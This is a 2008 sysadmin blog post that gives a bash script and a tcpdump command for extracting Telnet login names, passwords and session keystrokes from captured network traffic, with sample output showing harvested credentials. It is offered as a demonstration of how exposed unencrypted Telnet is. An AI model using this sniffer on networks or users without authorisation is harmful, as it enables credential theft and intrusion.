Tuesday, April 29, 2008

Grabbing Telnet Information On Linux Using TcpDump

Hello again,

Today, I thought we'd continue along our "snooping" path and clear the way for a solution that would satisfy more than one Operating System. Snoop, although a fine program in my estimation, isn't available at all except for use on Solaris Unix (If I'm wrong, please let me know :) After yesterday's post on snooping the ftp port and our earlier post on capturing logins and passwords over Telnet with snoop, it seemed like it was about time to get back to Linux.

Linux may not have the "snoop" command, but it hardly matters, since freeware programs like tcpdump, ethereal, snort, etc are all out there and can be compiled on pretty much any system (if your Linux distro doesn't already have a package readily available; which is doubtful ;)

For a more detailed look at the "process" involved in our tcpdump'ing, check out the old post on capturing logins and passwords even though it was for Solaris. The method of achieving the end results is so similar, and it took up so much HTML real-estate to convey, that it would be annoying (to put it mildly) to slap it right in the middle of this post :)

In any event, today we've written a quick bash shell script called "tcptelnet.sh." It takes standard input (STDIN) as its source of input (which can be fairly easily modified) and was made to run in a pipe-chain after a tcpdump command of the format below:

host # tcpdump -l -vvv -x -X port 23 |./tcptelnet.sh <--- Just so you have all the info in one place, the command line arguments listed here are: -l (to make the standard output (STDOUT) line buffered, or easier to read), -vvv (to make the output very very verbose), -x and -X (to print in HEX and ASCII, print out headers and pad packets with null bytes).

The reason the format of the tcpdump command is important is because changing it would change the way tcpdump spewed it's output, and the "tcptelnet.sh" script (much like our other shell scripts with regard to this topic) is a simple parser for the output to make it more readable. For instance, you must be the "root" user (or have equivalent privilege on the host you're running the script from) for this to work. This is not a way to "hack" or "get around" Linux security. This is just a demonstration of how readily available all unsecured information is, even on a secured network.

Following is a sample of the output you should expect. Note that, given tcpdump's output format, and my desire to not repeat the unnecessary complexity of our snoop script, I sacrificed the capital U for the sake of all-around convenience. This is only interesting in that, if you note a dot (.) where you think there should be a character, it's probably a capital U. All of the strings that our command generates show these on the echo-backs and I chose to only parse those, since they get sent with all regular, as well as password, information. You are, of course, welcome to make this shell script better. The nature of network traffic makes it a bit difficult to pin things down to absolutes, I've found ;)

And here's that sample session:

host # tcpdump -l -vvv -x -X port 23 |./tcptelnet.sh
tcpdump: listening on qfe0, link-type EN10MB (Ethernet), capture size 68 bytes

Possible session info to follow:
u.s.e.r.0.0.1..
Possible password to follow:
.listpy..
Possible login ID to follow:
.u.s.e.r.0.0.1..
Possible password to follow:
.sm0k3BomB..
Possible login ID to follow:
.h...m.m.e.r..
Possible password to follow:
.H.MM.S........
Possible login ID to follow:
.u.s.e.r.0.0.1..
Possible password to follow:
.MyS3cr3tP@ssw0rd.

Possible session info to follow:
....l.s...pw.d...e.x.i.t...^C254 packets captured
891 packets received by filter
0 packets dropped by kernel


As I noted above, the capital U gets whacked on some lines due to the output format and the way we process it in the bash script. For instance, the line that reads:

.h...m.m.e.r

was actually typed into the Telnet session as:

hUmmer

Once you note the pattern of input (and have the knowledge that this is the only letter - and only in capital form - that is excluded from our matches), it becomes fairly simple to fill in that small blank.

Hope you enjoy this script and do "good things" with it. Use it for security, not insecurity :)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# tcptelnet.sh - extract password and session information tcpdump
#
# 2008 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

login_or_pwd=0
sess_info=0

while read line
do
echo $line| grep "Last" >/dev/null 2>&1
ll_yes_or_no=$?
if [ $ll_yes_or_no -eq 0 ]
then
echo
login_or_pwd=0
continue
fi
echo $line| grep "gin:" >/dev/null 2>&1
l_yes_or_no=$?
if [ $l_yes_or_no -eq 0 ]
then
echo
echo "Possible login ID to follow: "
login_or_pwd=1
sess_info=0
continue
fi
echo $line| grep "sword" >/dev/null 2>&1
p_yes_or_no=$?
if [ $p_yes_or_no -eq 0 ]
then
echo
echo "Possible password to follow: "
login_or_pwd=1
sess_info=0
continue
fi
if [ $login_or_pwd -eq 1 ]
then
echo $line|awk '{ if ( $NF ~ /UUUUU$/ ) print $NF }'|sed 's/^.*\(.\)UUUUU$/\1/'|sed 's/^U/\./' |xargs -ivar echo "var\c"
continue
fi
if [ $login_or_pwd -eq 0 -a $sess_info -eq 0 ]
then
echo
echo "Possible session info to follow:"
sess_info=1
fi
if [ $sess_info -eq 1 ]
then
echo $line|awk '{ if ( $NF ~ /UUUUU$/ ) print $NF }'|sed 's/^.*\(.\)UUUUU$/\1/'|sed 's/^U/\./' |xargs -ivar echo "var\c"
continue
fi
done
echo
exit 0


, Mike